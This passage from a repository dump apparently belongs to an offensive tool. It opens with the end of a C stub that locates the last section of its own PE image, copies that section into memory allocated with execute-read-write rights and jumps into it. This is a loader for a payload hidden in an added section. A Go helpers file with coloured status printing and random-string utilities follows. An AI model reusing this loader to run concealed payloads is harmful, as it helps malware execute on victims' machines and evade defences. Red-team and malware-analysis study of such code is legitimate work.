27 | DWORD sectionLocation = (DWORD) & (imageNTHeaders->OptionalHeader) + (WORD)imageNTHeaders->FileHeader.SizeOfOptionalHeader;
28 | #endif
29 |
30 | DWORD sectionSize = (DWORD)sizeof(IMAGE_SECTION_HEADER);
31 | for (int i = 0; i < imageNTHeaders->FileHeader.NumberOfSections; i++)
32 | {
33 | sectionHeader = (PIMAGE_SECTION_HEADER)sectionLocation;
34 | sectionLocation += sectionSize;
35 | }
36 | // Execute last section data
37 | unsigned char *buffer = (unsigned char *)VirtualAlloc(NULL, sectionHeader->SizeOfRawData, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
38 | memcpy((void *)buffer, (void *)(sectionHeader->VirtualAddress + imageNTHeaders->OptionalHeader.ImageBase), sectionHeader->SizeOfRawData);
39 | (*(void (*)())buffer)();
40 |
41 | return 0;
42 | }
43 |
--------------------------------------------------------------------------------
/utils/helpers.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "fmt"
5 | "math/rand"
6 | "os"
7 | "runtime"
8 | "strings"
9 |
10 | "github.com/fatih/color"
11 | "github.com/sirupsen/logrus"
12 | )
13 |
14 | func PrintSuccess(formatstr string, a ...interface{}) {
15 | green := color.New(color.FgGreen).Add(color.Bold)
16 | green.Print("[*] ")
17 | fmt.Printf(formatstr, a...)
18 | }
19 |
20 | func PrintStatus(formatstr string, a ...interface{}) {
21 | blue := color.New(color.FgBlue).Add(color.Bold)
22 | blue.Print("[*] ")
23 | fmt.Printf(formatstr, a...)
24 | }
25 |
26 | func PrintWarning(formatstr string, a ...interface{}) {
27 | yellow := color.New(color.FgYellow).Add(color.Bold)
28 | yellow.Print("[*] ")
29 | fmt.Printf(formatstr, a...)
30 | }
31 |
32 | func PrintErr(formatstr string, a ...interface{}) {
33 | red := color.New(color.FgRed).Add(color.Bold)
34 | white := color.New(color.FgWhite).Add(color.Bold)
35 | red.Print("[-] ")
36 | white.Printf(formatstr, a...)
37 | }
38 |
39 | func PrintGreen(formatstr string, a ...interface{}) {
40 | green := color.New(color.FgGreen).Add(color.Bold)
41 | green.Printf(formatstr, a...)
42 | }
43 |
44 | func PrintFatal(err error) {
45 | if err != nil {
46 | pc, _, _, ok := runtime.Caller(1)
47 | details := runtime.FuncForPC(pc)
48 | if ok && details != nil {
49 | logrus.Fatalf("%s: %s\n", strings.ToUpper(strings.Split(details.Name(), ".")[1]), err)
50 | } else {
51 | logrus.Fatal(err)
52 | }
53 | }
54 | }
55 |
56 | // randomString - generates random string of given length
57 | func RandomString(length int) string {
58 | const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
59 | random := make([]byte, length)
60 | for i := 0; i < length; i++ {
61 | random[i] = charset[rand.Intn(len(charset))]
62 | }
63 | return string(random)
64 | }
65 |
66 | // GetFileSize retrieves the size of the file with given file path
67 | func GetFileSize(filePath string) (int, error) {
68 | file, err := os.Open(filePath)
69 | if err != nil {
70 | return 0, err
71 | }
72 | defer file.Close()
73 | stat, err := file.Stat()
74 | if err != nil {
75 | return 0, err
76 | }
77 | return int(stat.Size()), nil
78 | }
79 |
--------------------------------------------------------------------------------